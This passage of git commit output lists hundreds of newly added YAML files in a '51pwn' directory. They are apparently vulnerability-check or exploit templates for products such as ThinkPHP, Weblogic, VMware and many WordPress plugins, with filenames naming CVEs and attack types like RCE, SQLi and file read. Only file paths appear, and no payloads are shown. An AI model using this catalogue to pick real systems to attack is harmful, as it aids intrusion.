config/51pwn/yaml/TYPO3/CVE-2017-15363.yaml create mode 100755 config/51pwn/yaml/TamronOS/tamronos-rce.yaml create mode 100755 config/51pwn/yaml/Tapestry/CVE-2021-27850.yaml create mode 100755 config/51pwn/yaml/Teclib GLPI/CVE-2020-11034.yaml create mode 100755 config/51pwn/yaml/Tensorboard/UnAuthenticated-Tensorboard.yaml create mode 100755 config/51pwn/yaml/ThinkAdmin/CVE-2020-25540.yaml create mode 100755 config/51pwn/yaml/ThinkCMF/thinkcmf-arbitrary-code-execution.yaml create mode 100755 config/51pwn/yaml/ThinkCMF/thinkcmf-rce.yaml create mode 100755 config/51pwn/yaml/ThinkPHP/ThinkPHP-2-Rce.yaml create mode 100755 config/51pwn/yaml/ThinkPHP/ThinkPHP-501-RCE.yaml create mode 100755 config/51pwn/yaml/ThinkPHP/ThinkPHP-509-InformationDisclosure.yaml create mode 100755 config/51pwn/yaml/ThinkPHP/thinkphp-5023-rce.yaml create mode 100755 config/51pwn/yaml/ThinkPHP/thinkphp5-rce-invokefunction.yaml create mode 100755 config/51pwn/yaml/Tika/CVE-2018-1335.yaml create mode 100755 config/51pwn/yaml/Tiki Wiki CMS/CVE-2010-4239.yaml create mode 100755 config/51pwn/yaml/Tiki Wiki CMS/CVE-2011-4336.yaml create mode 100755 config/51pwn/yaml/Typecho/Typecho-Rce.yaml create mode 100755 "config/51pwn/yaml/Ueditor\347\274\226\350\276\221\345\231\250/ueditor_1433_net-upload-catchimage.yaml" create mode 100755 config/51pwn/yaml/Ulterius /CVE-2017-16806.yaml create mode 100755 config/51pwn/yaml/Umbraco/CVE-2015-8813.yaml create mode 100755 config/51pwn/yaml/Unomi/CVE-2020-13942.yaml create mode 100755 config/51pwn/yaml/Unraid/CVE-2020-5847.yaml create mode 100755 config/51pwn/yaml/V5SHOP/V5Shop-sqli-commond.yaml create mode 100755 config/51pwn/yaml/V5SHOP/wooyun-2013-043187.yaml create mode 100755 config/51pwn/yaml/V5SHOP/wooyun-2015-0101820.yaml create mode 100755 config/51pwn/yaml/VICIdial/CVE-2021-28854.yaml create mode 100755 config/51pwn/yaml/VMware Horizon/vmware-horizon-log4j-jndi-rce.yaml create mode 100755 config/51pwn/yaml/VMware Horizon/vmware-horizon-panel.yaml create mode 100755 config/51pwn/yaml/VMware View Planner/CVE-2021-21978.yaml create mode 100755 config/51pwn/yaml/VMware vCenter Server/CVE-2021-22005.yaml create mode 100755 config/51pwn/yaml/VMware vCenter Server/VmwareVcenter-Arbitrary-FileRead.yaml create mode 100755 config/51pwn/yaml/VMware vRealize Operations/CVE-2021-21975.yaml create mode 100755 config/51pwn/yaml/VMware vRealize Operations/vrealize-operations-log4j-rce.yaml create mode 100755 config/51pwn/yaml/VMware vSphere Client/CVE-2021-21972.yaml create mode 100755 config/51pwn/yaml/VMware vSphere Client/CVE-2021-21985.yaml create mode 100755 config/51pwn/yaml/VelotiSmart/CVE-2018-14064.yaml create mode 100755 config/51pwn/yaml/Vigor300B/CVE-2020-8515.yaml create mode 100755 config/51pwn/yaml/VigorConnect/CVE-2021-20123.yaml create mode 100755 config/51pwn/yaml/VigorConnect/CVE-2021-20124.yaml create mode 100755 config/51pwn/yaml/VipChat/Jcms-Vipchat-FileDownload.yaml create mode 100755 config/51pwn/yaml/Vmware Vcenter/poc-yaml-vmware-vcenter-ssrf.yaml create mode 100755 config/51pwn/yaml/Vmware Workspace One/CVE-2021-22054.yaml create mode 100755 config/51pwn/yaml/Vmware Workspace One/CVE-2022-22954.yaml create mode 100755 config/51pwn/yaml/VoIPmonitor/CVE-2021-30461.yaml create mode 100755 config/51pwn/yaml/WaveMaker Studio/CVE-2019-8982.yaml create mode 100755 config/51pwn/yaml/Wavlink WN575A4 /CVE-2020-13117.yaml create mode 100755 config/51pwn/yaml/Web Port/CVE-2019-12461.yaml create mode 100755 config/51pwn/yaml/WebGlimpse/CVE-2009-5114.yaml create mode 100755 config/51pwn/yaml/WebSphere/CVE-2015-7450.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2014-4210.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2017-10271.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2017-3506.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2018-2628.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2018-2893.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2018-2894.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2019-2725.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2019-2729.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2020-14750.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2020-14882.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2020-14883.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2020-2551.yaml create mode 100755 config/51pwn/yaml/Weblogic/CVE-2022-21371.yaml create mode 100755 config/51pwn/yaml/Western Bridge Cobub Razor/CVE-2018-8770.yaml create mode 100755 config/51pwn/yaml/Wifisky/wifisky-default-login.yaml create mode 100755 config/51pwn/yaml/Wing FTP Server/CVE-2020-27735.yaml create mode 100755 config/51pwn/yaml/Wlan AP /samsung-wlan-ap-lfi.yaml create mode 100755 config/51pwn/yaml/Wlan AP /samsung-wlan-ap-rce.yaml create mode 100755 config/51pwn/yaml/Wlan AP /samsung-wlan-ap-xss.yaml create mode 100755 config/51pwn/yaml/Wlan AP /samsung-wlan-default-login.yaml create mode 100755 config/51pwn/yaml/WordPress /CVE-2021-24987.yaml create mode 100755 config/51pwn/yaml/WordPress Plugin Advanced Dewplayer/WordPressPlugin-Advanced-Dewplayerlfd.yaml create mode 100755 config/51pwn/yaml/WordPress/CNNVD-201412-193.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2011-3440.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2011-3594.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2011-6136.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2011-6208.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2012-5790.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2012-8656.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2013-06167.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2014-01187.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2014-02541.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2014-04714.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2014-05543.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2014-05548.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2014-08564.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2015-02504.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2015-02598.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2015-02771.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2015-02973.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2015-03375.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2015-04041.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2015-04306.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2015-06157.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2016-11944.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2017-00009.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2018-16474.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2018-25692.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2018-26453.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2019-00234.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2019-07549.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2019-07550.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2019-08278.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2019-08493.yaml create mode 100755 config/51pwn/yaml/WordPress/CNVD-2019-08955.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2011-1669.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2011-4618.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2011-4624.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2011-4926.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2011-5106.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2011-5107.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2011-5179.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2011-5181.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2011-5265.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2012-0896.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2012-0901.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2012-1835.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2012-2371.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2012-2399.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2012-4242.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2012-4273.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2012-4768.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2012-5913.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2013-1852.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2013-2287.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2013-3526.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2013-4117.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2013-4625.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2013-6281.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2013-7240.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-1854.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4513.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4535.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4536.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4539.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4544.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4550.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4558.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4561.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4592.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-4940.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-5368.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-5389.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-8586.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-8799.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-8877.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-9094.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-9097.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-9173.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2014-9444.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-1000005.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-1000010.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-1000012.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-1494.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-2807.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-2824.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-2825.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-2826.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-3301.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-4018.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-4133.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-4414.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-4694.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-5461.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-5471.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-5472.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-6920.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-7377.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-7517.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-9406.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-9414.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2015-9480.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000126.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000127.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000128.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000129.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000130.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000131.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000132.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000133.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000134.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000135.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000136.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000137.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000138.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000139.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000140.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000141.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000142.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000143.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000146.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000148.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000149.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000152.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000153.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000154.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-1000155.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-10904.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-10924.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-10940.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-10956.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-10960.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-10981.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-10983.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-10991.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2016-10993.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-1000170.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-17043.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-17058.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-17059.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-17451.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-18536.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-18553.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-18598.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-5487.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-7719.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2017-9288.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-10969.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-11709.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-16283.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-16299.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-17074.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-18069.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-20462.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-20985.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-3810.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-5316.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-5651.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-7422.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-8719.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2018-9118.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-11869.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-14205.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-14470.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-15713.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-15858.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-15889.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-16332.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-16525.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-16931.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-16932.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-19134.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-19985.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-20141.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-6112.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-6715.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-9618.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2019-9978.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-11738.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-11930.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-12054.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-12800.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-13700.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-14092.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-17362.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-24148.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-24186.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-24312.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-25213.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-26153.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-26876.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-28976.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-29395.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-35234.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-35489.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-35749.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-35951.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-36510.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2020-8771.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-20792.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-21389.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24146.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24176.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24210.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24226.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24235.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24237.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24274.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24275.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24276.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24278.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24285.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24288.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24291.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24298.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24300.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24316.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24320.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24335.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24340.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24342.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24358.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24364.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24387.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24389.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24406.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24407.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24472.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24488.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24495.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24498.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24499.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24510.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24746.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24750.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24762.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24838.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24926.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24947.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24991.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-24997.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25008.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25028.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25033.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25052.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25055.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25063.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25074.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25075.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25111.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25112.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25118.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-25120.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-34621.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-34640.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-34643.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-38314.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-39312.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-39316.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-39320.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-39322.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-39327.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2021-39350.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0140.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0148.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0149.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0165.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0189.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0201.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0208.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0218.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0271.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0288.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0346.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0381.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0422.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0591.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0595.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-0653.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-1020.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-1054.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-1119.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-1221.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-1392.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-1597.yaml create mode 100755 config/51pwn/yaml/WordPress/CVE-2022-27849.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Abtest_Plugin-LFI.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Ad_Buttons_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Ajax_Store_Locator_Wordpress_Plugins-FileInclude.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Ari_Adminer_Plugins-DatabaseDownlaod.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-BatchMove_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Begin_Themes-Redirection.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Brandfolder-LFI.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Caldera_Forms_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Community_Events_Plugins-SQLi.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Custom-Blocks_SypexGeo_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Dev_Custom_Management_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Disqus_Comment_System_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Exports_and_Reports_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-FancyBox_For_Wordpress_Plugins-FullPathDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/WordPress-Toolbox_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpess-wppg_photo_details_gallery_id-SQLi.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-497-InfoDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-4_7-InfoDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-4_7_3_revslider-InfoDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-4_9_x_u_parts-FileRead.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-53-UserDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Apptha_Slider_Gallery_Plugins-FileRead.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-AzonPop_Plugin-SQLi.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-CIP4-LFI.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Cp_Multi_View_Calendar_Plugins-SQLi.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Diarise_Plugins-LFI.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Estrutura-Basica_Plugins-FileDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-FAQ_Plugins-DirectoryCross.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Fusion_Engage_Plugins-FileDisclosure.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-HighStand_Themes-DatabaseBackupDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-IP-Logger_Plugins-SQLi.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-IncredibleWP_Theme-ArbitraryFileDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Issuu_Panelr_Plugins-LFI.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-Ithemes_BackupBuddy_Amazon_WP-S3_Plugins-DatabaseDownload.yaml create mode 100755 config/51pwn/yaml/WordPress/Wordpress-JoeBooking_Plugins-DatabaseBackupDisclosure.yaml create mode 100755 